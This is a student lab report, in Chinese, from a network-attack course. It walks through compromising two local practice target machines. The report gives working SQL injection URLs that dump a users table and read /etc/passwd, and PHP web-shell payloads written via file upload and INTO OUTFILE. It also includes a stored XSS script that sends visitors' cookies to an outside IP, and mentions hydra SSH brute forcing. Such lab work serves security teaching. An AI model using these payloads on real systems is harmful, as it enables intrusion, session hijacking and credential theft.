中国人民公安大学
Chinese people’ public security university
网络对抗技术
实验报告
实验五 |
web攻击靶机 |
学生姓名 |
王磊 |
年级 |
2015 |
区队 |
二 |
指导教师 |
高见 |
信息技术与网络安全学院
2018年10月10日
一、sql注入靶机攻击
首先搭建虚拟机 用kali扫描下当前网段netdiscover -r 192.168.2.0/24
发现可疑ip地址192.168.2.129
并使用nmap扫描这个ip地址,发现其开放了ftp和http协议
打开该虚拟机提供的网页,发现该网站使用url传参,可能存在sql注入点
在id=1后加一个引号,网页报错 该网站存在sql注入漏洞
使用order by语句试出网站后台数据库表的列数 当order by 5 时网页报错 因此该查询涉及到四列元素
使用联合查询 查看网页的显示位,得到显示位就可以显示数据库的名字 photoblog
http://192.168.2.129/cat.php?id=-2%20union%20select%201,database%20(),3,4
得到数据库名字 可以查询数据库中有那些表http://192.168.2.129/cat.php?id=-2%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27photoblog%27
一般情况下users表对我们有用
http://192.168.2.129/cat.php?id=-2%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27users%27
继续查询users表中列名,有变量名 id,login,password
查看users表中的数据:id=1 login=admin password=8efe310f9ab3efeae8d410a8e0166eb2
http://192.168.2.129/cat.php?id=-1%20union%20select%201,group_concat(id,0x23,login,0x23,password),3,4%20from%20users
MD5解密后,得到密码P4ssw0rd
登录到管理员页面
尝试上传文件,<?php eval($_POST['a'])?>
发现nophp
改完后缀名发现,可以绕过,并上传成功
http://192.168.2.129/admin/uploads/123456.pHp
得到目录,菜刀连接
2.xss靶机攻击
nmap 扫描192.168.2.130发现靶机开着80端口和ssh协议
测试
有窗口弹出,证明存在漏洞
在靶机上留言<script>document.write('<img src="http://172.22.152.33/?'+document.cookie+' "/>')</script>
可以将任意登录用户的cookie发送到指定ip 在指定 ip 接受 cookie 后可以伪造成登陆者
登录界面:使用密码和用户名进行登录
获取到的cookie
使用cookie再次进行登录:发现已经已admin的身份登录进页面中。
进入管理界面后,发现博客编辑界面存在sql注入漏洞
http://192.168.2.130/admin/edit.php?id=4 union select 1,2,3,4
发现2和3可以显示出来。
http://192.168.2.130/admin/edit.php?id=0 union select 1,2,load_file("/etc/passwd"),4
可以读取passwd文件,但是不能读取shadow文件。
我们尝试能不能创建一个文件。
在编辑页面发现错误提示中有/var/www/classes 目录,
尝试后发现/var/www/css 目录可写。
于是构造语句:
http://192.168.2.130/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22
然后打开
http://192.168.2.130/css/s.php
说明s.php文件成功写入到/var/www/css 目录,下面将
<?php system($_GET['c']); ?>
写入z.php中,构造url为:
http://192.168.2.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22
访问z.php,并使用uname -a获取系统信息。可以远程执行命令。
下面写入一句话木马,构造url:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22
菜刀链接:
下面写入一句话木马,构造url:
http://192.168.2.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22
菜刀链接:
发现机器开了ssh,因此用hydra爆破下:
ssh登陆